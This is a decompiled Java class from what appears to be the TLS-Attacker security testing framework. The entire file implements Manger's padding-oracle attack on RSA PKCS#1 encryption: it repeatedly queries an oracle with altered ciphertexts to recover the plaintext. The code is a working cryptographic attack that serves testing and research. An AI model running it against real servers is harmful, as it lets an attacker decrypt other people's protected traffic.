/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.pkcs1;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.pkcs1.Interval;
import de.rub.nds.tlsattacker.attacks.pkcs1.OracleException;
import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1Attack;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.Pkcs1Oracle;
import de.rub.nds.tlsattacker.util.MathHelper;
import java.math.BigInteger;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Manger
extends Pkcs1Attack {
    private static final Logger LOGGER = LogManager.getLogger();
    protected Interval result;
    private volatile boolean interrupted = false;

    public Manger(byte[] msg, Pkcs1Oracle pkcsOracle) {
        super(msg, pkcsOracle);
        int tmp = this.publicKey.getModulus().bitLength();
        tmp = (MathHelper.intceildiv((int)tmp, (int)8) - 1) * 8;
        this.bigB = BigInteger.ONE.shiftLeft(tmp);
        this.c0 = new BigInteger(1, this.encryptedMsg);
        LOGGER.debug("b: {}", (Object)ArrayConverter.bytesToHexString((byte[])this.bigB.toByteArray()));
    }

    public void attack() throws OracleException {
        BigInteger cc;
        LOGGER.debug("Step 0:  Ensuring that m in [0,B)");
        BigInteger fx = BigInteger.ONE;
        if (!this.queryOracle(this.c0, fx)) {
            BigInteger cx = this.c0;
            fx = fx.add(BigInteger.ONE);
            while (!this.interrupted) {
                cx = this.multiply(this.c0, fx);
                if (this.queryOracle(cx)) {
                    this.c0 = cx;
                    break;
                }
                fx = fx.add(BigInteger.ONE);
            }
        }
        LOGGER.debug("Ciphertext after step 0: {}", (Object)ArrayConverter.bytesToHexString((byte[])this.c0.toByteArray()));
        LOGGER.debug("Step 1");
        BigInteger f1 = new BigInteger("2");
        while (!this.interrupted && this.queryOracle(cc = this.multiply(this.c0, f1))) {
            f1 = f1.shiftLeft(1);
        }
        LOGGER.debug("Step 2");
        BigInteger tmp = MathHelper.intfloordiv((BigInteger)this.publicKey.getModulus().add(this.bigB), (BigInteger)this.bigB);
        BigInteger f2 = tmp.multiply(f1.shiftRight(1));
        while (!this.interrupted && !this.queryOracle(cc = this.multiply(this.c0, f2))) {
            f2 = f2.add(f1.shiftRight(1));
        }
        LOGGER.debug("Step 3");
        BigInteger mmin = MathHelper.intceildiv((BigInteger)this.publicKey.getModulus(), (BigInteger)f2);
        BigInteger mmax = MathHelper.intfloordiv((BigInteger)this.publicKey.getModulus().add(this.bigB), (BigInteger)f2);
        this.result = new Interval(mmin, mmax);
        boolean previntervalsize = false;
        while (!this.interrupted) {
            BigInteger ftmp = MathHelper.intfloordiv((BigInteger)this.bigB.shiftLeft(1), (BigInteger)mmax.subtract(mmin));
            BigInteger i = MathHelper.intfloordiv((BigInteger)ftmp.multiply(mmin), (BigInteger)this.publicKey.getModulus());
            BigInteger f3 = MathHelper.intceildiv((BigInteger)i.multiply(this.publicKey.getModulus()), (BigInteger)mmin);
            cc = this.multiply(this.c0, f3);
            if (!this.queryOracle(cc)) {
                mmin = MathHelper.intceildiv((BigInteger)i.multiply(this.publicKey.getModulus()).add(this.bigB), (BigInteger)f3);
            } else {
                mmax = MathHelper.intfloordiv((BigInteger)i.multiply(this.publicKey.getModulus()).add(this.bigB), (BigInteger)f3);
            }
            if (!mmax.equals(mmin)) continue;
            break;
        }
        if (!this.interrupted) {
            LOGGER.debug("Manger's attack solution (before inverse computation, if any): {}", (Object)ArrayConverter.bytesToHexString((byte[])mmin.toByteArray()));
            if (fx.equals(BigInteger.ONE)) {
                this.solution = mmin;
            } else {
                BigInteger inverse = fx.modInverse(this.publicKey.getModulus());
                this.solution = mmin.multiply(inverse).mod(this.publicKey.getModulus());
            }
            LOGGER.debug("Manger's attack solution (after inverse computation, if any): {}", (Object)ArrayConverter.bytesToHexString((byte[])this.solution.toByteArray()));
        }
    }

    public boolean isInterrupted() {
        return this.interrupted;
    }

    public void setInterrupted(boolean interrupted) {
        this.interrupted = interrupted;
    }
}

